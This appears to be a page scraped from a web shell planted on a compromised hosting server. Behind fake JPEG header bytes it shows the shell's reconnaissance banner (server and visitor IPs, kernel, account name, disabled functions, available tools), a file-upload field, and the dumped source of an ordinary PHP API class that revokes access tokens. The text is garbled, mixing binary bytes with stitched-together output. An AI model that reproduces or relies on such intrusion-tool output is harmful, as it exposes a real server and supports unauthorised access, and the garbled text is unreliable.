����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.145.109.97 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/./ideyshare.name.ng/app/services/api/v2/endpoint/ |
Upload File : |
<?php /* * API endpoint class */ namespace App\Services\Api\V2\Endpoint; use App\Services\Api\V2\ApiV2; class ApiDisableAccessToken extends ApiV2 { public function __construct($request, $origin) { parent::__construct($request); // all api requests require the access_token and account_id (apart from the initial authorize if (!array_key_exists('access_token', $this->request) || (strlen($this->request['access_token']) == 0)) { throw new \Exception('Please provide the access_token param.'); } elseif (!array_key_exists('account_id', $this->request) || (strlen($this->request['account_id']) == 0)) { throw new \Exception('Please provide the account_id param.'); } // validate access_token and account_id $rs = $this->_validateAccessToken($this->request['access_token'], $this->request['account_id']); if (!$rs) { throw new \Exception('Could not validate access_token and account_id, please reauthenticate or try again.'); } } /** * default endpoint action */ protected function index() { // disable token $rs = $this->_clearAllAccessTokensByUserId($this->request['account_id'], $this->request['access_token']); return array( 'response' => 'Token removed or no longer available.' ); } }